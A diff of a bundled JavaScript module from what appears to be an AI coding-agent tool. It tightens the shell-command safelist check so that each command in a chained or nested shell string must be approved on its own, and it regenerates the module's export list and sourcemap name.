@@ -7895,9 +8479,26 @@ function matchesSafelistEntry(entry, tool, input) {
 	if (scope.endsWith(":*")) return primaryArgToken(input) === scope.slice(0, -2);
 	return false;
 }
-/** True when a call matches ANY entry in the project's safelist (or is implicitly safe). */
+/**
+* True when a call matches ANY entry in the project's safelist (or is
+* implicitly safe).
+*
+* For `shell` commands, the full command string is parsed into individual
+* commands (handling `&&`, `||`, `;`, `|`, `$(…)`, backticks, subshells).
+* Every command head must be covered by at least one safelist entry for
+* the call to pass. If parsing fails, returns `false` (prompt the user).
+*/
 function isOnSafelist(entries, tool, input) {
 	if (IMPLICITLY_SAFE_TOOLS.includes(tool)) return true;
+	if (tool === "shell") {
+		const heads = extractCommandHeads(typeof input.command === "string" ? input.command : "");
+		if (heads === null) return false;
+		if (heads.length === 0) return entries.some((e) => matchesSafelistEntry(e, tool, input));
+		return heads.every((head) => entries.some((e) => matchesSafelistEntry(e, tool, {
+			...input,
+			command: head
+		})));
+	}
 	return entries.some((e) => matchesSafelistEntry(e, tool, input));
 }
 /**
@@ -9188,6 +9789,6 @@ function countNeighbors(turnIds, turnId) {
 	};
 }
 //#endregion
-export { useMcpAuthDispatch as $, tryOpenBrowser as $n, pruneTodosByRun as $r, loadState as $t, getSafelist as A, DEFAULT_KEYBINDINGS as An, modelsForDescriptor as Ar, resolveChipColor as At, supportsOAuth as B, SKILLS_TRIGGER as Bn, accentColor as Br, useDiscoveryOptional as Bt, resolveSessionExportTarget as C, mergeApprovalAndBodyOutcomes as Cn, anthropicDescriptor as Cr, SETTINGS_CHOICES as Ct, useSafeModeQueue as D, stripEditOutcomesAnnotation as Dn, getContextWindow as Dr, useSettings as Dt, useSafeModeActions as E, rewriteMultiEditHeader as En, effectiveContextWindow as Er, clampFps as Et, suggestSafelistEntry as F, matchesBinding as Fn, BUILTIN_AGENTS as Fr, CATPPUCCIN_MACCHIATO as Ft, defaultMcpsConfigPaths as G, uniqueFilesFromReferences as Gn, TODOWRITE_TOOL as Gr, createStateStore as Gt, filterModelCatalog as H, uniqueSkillNamesFromReferences as Hn, singleAgentRegistry as Hr, useConfig as Ht, writeProjects as I, mergeKeybindings as In, DEFAULT_AGENT_ID as Ir, CATPPUCCIN_MOCHA as It, projectUserPaths as J, findActiveTrigger as Jn, createTodoTools as Jr, isEditErrorResult as Jt, discoverProjectMcps as K, applyInsert as Kn, TODO_STATUS_GLYPHS as Kr, deriveSessionTitle as Kt, splitPromptSegments as L, parseBindingSpec as Ln, DEFAULT_BUDGET_EXCLUDE_TOOLS as Lr, createDiscoverySlot as Lt, matchesSafelistEntry as M, KEYBINDING_DEF_BY_ACTION as Mn, openrouterDescriptor as Mr, VAPORWAVE_THEME as Mt, projectsFilePath as N, ensureKeybindingsFile as Nn, piIdOf as Nr, CATPPUCCIN_FRAPPE as Nt, IMPLICITLY_SAFE_TOOLS as O, summarizeOutcomes as On, getModelInfo as Or, BUILTIN_THEMES as Ot, readProjects as P, keybindingsPath as Pn, BUILD_AGENT as Pr, CATPPUCCIN_LATTE as Pt, McpAuthProvider as Q, buildLinearRamp as Qn, pickActiveRunId as Qr, listSessionMeta as Qt, formatPathForCwd as R, readKeybindings as Rn, DEFAULT_PERSIST_EXCLUDE_TOOLS as Rr, DiscoveryProvider as Rt, renderSession as S, maskToOutcomeKinds as Sn, OUTPUT_RESERVE_TOKENS as Sr, DEFAULT_SETTINGS as St, SafeModeProvider as T, resolveApprovalForPayload as Tn, credKeyOf as Tr, SettingsProvider as Tt, indexOfEntry as U, FILES_TRIGGER as Un, TODOREAD_TOOL as Ur, resolveConfig as Ut, buildModelCatalog as V, createSkillsCompletionProvider as Vn, resolveAgentId as Vr, ConfigProvider as Vt, buildMcpServers as W, createFilesCompletionProvider as Wn, TODOS_METADATA_KEY as Wr, EDIT_TOOL_NAMES as Wt, mcpCredentialsPath as X, useCompletion as Xn, getTodosForRun as Xr, isVisible as Xt, createFileMcpCredentialStore as Y, mergeReferences as Yn, getArchivedTodosForRun as Yr, isTurnHighlighted as Yt, patchMcpCredential as Z, blendHsl as Zn, isTodoTool as Zr, lastContextSizeFromTurns as Zt, turnContextSize as _, previewEditPayload as _n, readProviderCredential as _r, truncateTrailing as _t, computeTurnAnchors as a, DOING_TASKS_DOCTRINE as ai, titleFromTurns as an, compareSemver as ar, InteractionsProvider as at, defaultSkillScanPaths as b, tokenize as bn, writeCredentials as br, listProjectFiles as bt, formatToolCall as c, INTERACTION_GUIDANCE_NO_PROMPTS as ci, turnSelectionOwnership as cn, parseSemver as cr, createInteractionTools as ct, useSelectStyle as d, SUBAGENT_GUIDANCE as di, buildContextualDiff as dn, resolvePlatformPackage as dr, pendingInteractionsFromTurns as dt, selectActiveTodos as ei, marginTopFor as en, bootProfileEnabled as er, useMcpAuthState as et, useSurfaces as f, TOKEN_DISCIPLINE_DOCTRINE as fi, buildUnifiedDiff as fn, shouldAutoCompact as fr, serializeInteractionResponse as ft, finalizeStreamingMarkdownForOwner as g, filetypeFromPath as gn, readCredentials as gr, hintsLength as gt, finalizeStreamingMarkdown as h, envSection as hi, extractEditPayload as hn, credentialsPath as hr, clipHintsToWidth as ht, turnAsText as i, COMMUNICATION_DOCTRINE as ii, sumRunCosts as in, checkForUpdate as ir, ASK_USER_TOOL as it, isOnSafelist as j, KEYBINDING_DEFS as jn, openaiDescriptor as jr, resolveTheme as jt, addToSafelist as k, findGitRoot$1 as kn, modelSupportsReasoning as kr, DEFAULT_THEME as kt, ThemeProvider as l, PLAN_MODE_DOCTRINE as li, updateToolEventOutcomes as ln, performInPlaceSelfUpdate as lr, isInteractionTool as lt, useTheme as m, buildPlanSystem as mi, computeLineDiff as mn, applyApiKeyEnv as mr, useInteractionsQueue as mt, deleteTurnSafely as n, useActiveTodos as ni, selectableTurnIds as nn, buildUpdateHint as nr, reduceMcpAuth as nt, TOOL_DISPLAY as o, IDENTITY_PREFIX as oi, toolCallPreview as on, detectLibc as or, PRESENT_PLAN_TOOL as ot, useSyntaxStyles as p, buildBuildSystem as pi, computeInlineDiff as pn, detectAuth as pr, useInteractionsActions as pt, parseMcpsFile as q, collectReferences as qn, TODO_WRITE_COUNTS_METADATA_KEY as qr, eventsFromTurns as qt, truncateTurnsAt as r, ACTIONS_WITH_CARE_DOCTRINE as ri, stripSpawnTokensLine as rn, useUpdateCheck as rr, splitMarkdownCodeBlocks as rt, displayNameFor as s, INTERACTION_GUIDANCE as si, toolResultText as sn, detectPackageManager as sr, buildResumedToolResultsTurn as st, countNeighbors as t, setTodosForRun as ti, saveState as tn, bootTick as tr, getMcpAuthStatus as tt, useColors as u, PLAN_MODE_DOCTRINE_NO_PROMPTS as ui, applyEditPayload as un, performSelfUpdate as ur, makeRequestInteraction as ut, useStreamBuffer as v, splitLines as vn, removeProviderCredential as vr, cleanTitle as vt, writeSessionExport as w, parseEditOutcomesFromResult as wn, cerebrasDescriptor as wr, SETTINGS_TOGGLES as wt, discoverProjectSkills as x, buildEditOutcomesAnnotation as xn, BUILTIN_PROVIDERS as xr, useEnabledToggleSet as xt, buildSkillsConfig as y, summarizeEditPayload as yn, setProviderCredential as yr, generateSessionTitle as yt, runOAuthLogin as z, stripJsonComments as zn, PLAN_AGENT as zr, useDiscovery as zt };
+export { patchMcpCredential as $, collectReferences as $n, TODO_STATUS_GLYPHS as $r, isEditErrorResult as $t, getSafelist as A, resolveApprovalForPayload as An, anthropicDescriptor as Ar, SettingsProvider as At, oauthUsesManualCodePaste as B, keybindingsPath as Bn, piIdOf as Br, CATPPUCCIN_MACCHIATO as Bt, resolveSessionExportTarget as C, splitLines as Cn, readCredentials as Cr, buildHints as Ct, useSafeModeQueue as D, maskToOutcomeKinds as Dn, writeCredentials as Dr, DEFAULT_SETTINGS as Dt, useSafeModeActions as E, buildEditOutcomesAnnotation as En, setProviderCredential as Er, useEnabledToggleSet as Et, suggestSafelistEntry as F, DEFAULT_KEYBINDINGS as Fn, getModelInfo as Fr, resolveChipColor as Ft, indexOfEntry as G, stripJsonComments as Gn, DEFAULT_PERSIST_EXCLUDE_TOOLS as Gr, useDiscoveryOptional as Gt, supportsOAuth as H, mergeKeybindings as Hn, BUILTIN_AGENTS as Hr, createDiscoverySlot as Ht, writeProjects as I, KEYBINDING_DEFS as In, modelSupportsReasoning as Ir, resolveTheme as It, discoverProjectMcps as J, uniqueSkillNamesFromReferences as Jn, resolveAgentId as Jr, resolveConfig as Jt, buildMcpServers as K, SKILLS_TRIGGER as Kn, PLAN_AGENT as Kr, ConfigProvider as Kt, splitPromptSegments as L, KEYBINDING_DEF_BY_ACTION as Ln, modelsForDescriptor as Lr, VAPORWAVE_THEME as Lt, matchesSafelistEntry as M, stripEditOutcomesAnnotation as Mn, credKeyOf as Mr, useSettings as Mt, projectsFilePath as N, summarizeOutcomes as Nn, effectiveContextWindow as Nr, BUILTIN_THEMES as Nt, IMPLICITLY_SAFE_TOOLS as O, mergeApprovalAndBodyOutcomes as On, BUILTIN_PROVIDERS as Or, SETTINGS_CHOICES as Ot, readProjects as P, findGitRoot$1 as Pn, getContextWindow as Pr, DEFAULT_THEME as Pt, mcpCredentialsPath as Q, applyInsert as Qn, TODOWRITE_TOOL as Qr, eventsFromTurns as Qt, formatPathForCwd as R, ensureKeybindingsFile as Rn, openaiDescriptor as Rr, CATPPUCCIN_FRAPPE as Rt, renderSession as S, envSection as Si, previewEditPayload as Sn, credentialsPath as Sr, generateSessionTitle as St, SafeModeProvider as T, tokenize as Tn, removeProviderCredential as Tr, listProjectFiles as Tt, buildModelCatalog as U, parseBindingSpec as Un, DEFAULT_AGENT_ID as Ur, DiscoveryProvider as Ut, runOAuthLogin as V, matchesBinding as Vn, BUILD_AGENT as Vr, CATPPUCCIN_MOCHA as Vt, filterModelCatalog as W, readKeybindings as Wn, DEFAULT_BUDGET_EXCLUDE_TOOLS as Wr, useDiscovery as Wt, projectUserPaths as X, createFilesCompletionProvider as Xn, TODOREAD_TOOL as Xr, createStateStore as Xt, parseMcpsFile as Y, FILES_TRIGGER as Yn, singleAgentRegistry as Yr, EDIT_TOOL_NAMES as Yt, createFileMcpCredentialStore as Z, uniqueFilesFromReferences as Zn, TODOS_METADATA_KEY as Zr, deriveSessionTitle as Zt, turnContextSize as _, PLAN_MODE_DOCTRINE_NO_PROMPTS as _i, buildUnifiedDiff as _n, resolvePlatformPackage as _r, EMPTY_HINTS as _t, computeTurnAnchors as a, pickActiveRunId as ai, marginTopFor as an, tryOpenBrowser as ar, splitMarkdownCodeBlocks as at, defaultSkillScanPaths as b, buildBuildSystem as bi, extractEditPayload as bn, detectAuth as br, truncateTrailing as bt, formatToolCall as c, setTodosForRun as ci, stripSpawnTokensLine as cn, buildUpdateHint as cr, PRESENT_PLAN_TOOL as ct, useSelectStyle as d, COMMUNICATION_DOCTRINE as di, toolCallPreview as dn, compareSemver as dr, isInteractionTool as dt, TODO_WRITE_COUNTS_METADATA_KEY as ei, isTurnHighlighted as en, findActiveTrigger as er, McpAuthProvider as et, useSurfaces as f, DOING_TASKS_DOCTRINE as fi, toolResultText as fn, detectLibc as fr, makeRequestInteraction as ft, finalizeStreamingMarkdownForOwner as g, PLAN_MODE_DOCTRINE as gi, buildContextualDiff as gn, performSelfUpdate as gr, useInteractionsQueue as gt, finalizeStreamingMarkdown as h, INTERACTION_GUIDANCE_NO_PROMPTS as hi, applyEditPayload as hn, performInPlaceSelfUpdate as hr, useInteractionsActions as ht, turnAsText as i, isTodoTool as ii, loadState as in, buildLinearRamp as ir, reduceMcpAuth as it, isOnSafelist as j, rewriteMultiEditHeader as jn, cerebrasDescriptor as jr, clampFps as jt, addToSafelist as k, parseEditOutcomesFromResult as kn, OUTPUT_RESERVE_TOKENS as kr, SETTINGS_TOGGLES as kt, ThemeProvider as l, useActiveTodos as li, sumRunCosts as ln, useUpdateCheck as lr, buildResumedToolResultsTurn as lt, useTheme as m, INTERACTION_GUIDANCE as mi, updateToolEventOutcomes as mn, parseSemver as mr, serializeInteractionResponse as mt, deleteTurnSafely as n, getArchivedTodosForRun as ni, lastContextSizeFromTurns as nn, useCompletion as nr, useMcpAuthState as nt, TOOL_DISPLAY as o, pruneTodosByRun as oi, saveState as on, bootProfileEnabled as or, ASK_USER_TOOL as ot, useSyntaxStyles as p, IDENTITY_PREFIX as pi, turnSelectionOwnership as pn, detectPackageManager as pr, pendingInteractionsFromTurns as pt, defaultMcpsConfigPaths as q, createSkillsCompletionProvider as qn, accentColor as qr, useConfig as qt, truncateTurnsAt as r, getTodosForRun as ri, listSessionMeta as rn, blendHsl as rr, getMcpAuthStatus as rt, displayNameFor as s, selectActiveTodos as si, selectableTurnIds as sn, bootTick as sr, InteractionsProvider as st, countNeighbors as t, createTodoTools as ti, isVisible as tn, mergeReferences as tr, useMcpAuthDispatch as tt, useColors as u, ACTIONS_WITH_CARE_DOCTRINE as ui, titleFromTurns as un, checkForUpdate as ur, createInteractionTools as ut, useStreamBuffer as v, SUBAGENT_GUIDANCE as vi, computeInlineDiff as vn, AUTO_COMPACT_MIN_GROWTH_FRACTION as vr, clipHintsToWidth as vt, writeSessionExport as w, summarizeEditPayload as wn, readProviderCredential as wr, shortChord as wt, discoverProjectSkills as x, buildPlanSystem as xi, filetypeFromPath as xn, applyApiKeyEnv as xr, cleanTitle as xt, buildSkillsConfig as y, TOKEN_DISCIPLINE_DOCTRINE as yi, computeLineDiff as yn, shouldAutoCompact as yr, hintsLength as yt, fetchOAuthRedirect as z, formatBindingForDisplay as zn, openrouterDescriptor as zr, CATPPUCCIN_LATTE as zt };
 
-//# sourceMappingURL=turn-operations-rYyU2Qyq.js.map
+//# sourceMappingURL=turn-operations-B8ySajUl.js.map